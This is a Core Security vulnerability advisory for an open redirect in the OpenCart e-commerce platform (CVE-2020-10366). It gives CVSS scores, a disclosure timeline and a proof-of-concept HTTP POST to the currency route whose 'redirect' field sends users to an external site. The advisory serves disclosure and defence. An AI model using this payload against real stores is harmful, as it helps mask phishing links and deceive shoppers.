CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
EPSS
Percentile
40.0%
Title: Open Redirect in OpenCart **Advisory ID: **CORE-2020-0006 **Advisory URL:**https://www.coresecurity.com/advisories/open-redirect-opencart **Date published: **2020-05-04 **Date of last update: **2020-05-04 Vendors contacted:OpenCart Release mode: Forced release
Class: URL Redirection to Untrusted Site (Open Redirect) [CWE-601] **Impact: **Phishing attacks **Remotely Exploitable: **Yes **Locally Exploitable:**No CVE Name: CVE-2020-10366
OpenCart [1] is an open source PHP-based online store management system. It can be used to create an online shopping framework, providing the ability to create both a front-end store for customers, as well as a full e-commerce platform for owners with administrative, inventory, and reporting capabilities. There are hundreds of community-built add-ons for additional functionality.
An open redirect was discovered in the web application which accepts a website redirection to an external site without checking the user input.
Other versions might be affected, but they were not tested.
No patches or new versions have been released to fix the reported issue.
This vulnerability was discovered and researched by Matias Meviedfrom Core Security Consulting Services Team.
The publication of this advisory was coordinated by Pablo Zurro from the CoreLabs Advisories Team.
[CVE-2020-10366] An attacker could use a specially crafted link to a page of OpenCart to redirect a user to an arbitrary web page of the attackerβs choice. This allows the attacker to mask a phishing attack with a trusted-looking link since the page appears to be under the domain where OpenCart is installed.
The following proof of concept shows how the redirection is performed:
POST /index.php?route=common/currency/currency HTTP/1.1 Host: 172.16.93.133 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Connection: close Cache-Control: max-age=0 Referer: http://localhost/index.php?route=product%2fproduct&manufacturer_id=8&product_id=45 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYV0s5w4r Content-Length: 233 Cookie: OCSESSID=10b302c7525052481e13d6fa5c; language=en-gb; currency=USD ------WebKitFormBoundaryYV0s5w4r Content-Disposition: form-data; name="code" ------WebKitFormBoundaryYV0s5wcon Content-Disposition: form-data; name="redirect" http://www.coresecurity.com ------WebKitFormBoundaryYV0s5w4rβ HTTP/1.1 302 Found Date: Thu, 06 Feb 2020 13:44:25 GMT Server: Apache/2.4.41 (Unix) OpenSSL/1.1.1d PHP/7.4.1 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/7.4.1 Set-Cookie: OCSESSID=10b302c7525052481e13d6fa5c; path=/ **Location: http://www.coresecurity.com** Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
In the above example, the HTTP 302 response redirects the user to http://www.coresecurity.com.
2020-01-10 - Vulnerability discovered by CoreLabs.
2020-03-27 - Email sent to OpenCart to ask about the correct contact for reporting advisory.
2020-03-27 - Ticket #254509 opened at OpenCart.
2020-04-07 - Ticket closed on their side. They are not interested in pursuing this issue.
2020-04-07 - CVE requested from Mitre and provided. We pivot to forced release. CVE-2020-10366 will be used.
2020-04-30 - OpenCart is informed about the publication of the forced release.
2020-05-04 - Advisory published.
CoreLabs, the research center of Core Security, A Fortra Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>.
Core Security, a Fortra Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].
The contents of this advisory are copyright Β© 2020 Core Security and Β© 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
EPSS
Percentile
40.0%